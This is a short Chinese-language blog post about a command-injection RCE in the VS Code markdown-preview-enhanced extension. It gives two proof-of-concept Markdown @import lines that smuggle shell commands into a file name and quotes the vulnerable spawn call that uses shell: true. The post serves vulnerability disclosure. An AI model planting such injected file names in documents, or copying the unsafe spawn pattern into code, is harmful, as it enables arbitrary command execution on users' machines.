VS Code "又" 出現一個 RCE 漏洞,但是這次是出現在 markdown-preview-enhanced 插件上面,目前我測試的時間點(2022/12/11) 還沒有釋出修補版本,所以最近用這個插件開 Markdown 檔案的時候要小心啊
相關資訊 : CVE Trends、Twitter 张惠倩,攻擊原理參考 資安這條路 07 - [Injection] Command injection
測試環境建立 :
<!-- @import "$(touch /tmp/pwned | exit 0)hello.pdf" -->
<!-- @import "$(sleep 999999 | exit 0)hello.pdf" -->
child_process.spawn(command[, args][, options])
var task = null ;
if (fs.existsSync(pdfFilePath)) {
task = spawn(
"pdf2svg",
[
`"${pdfFilePath}"`,
`"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
"all",
],
{ shell: true },
);
} else {
task = spawn(
"pdf2svg",
[
`"./test.pdf"`,
`"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
"all",
],
{ shell: true },
);
}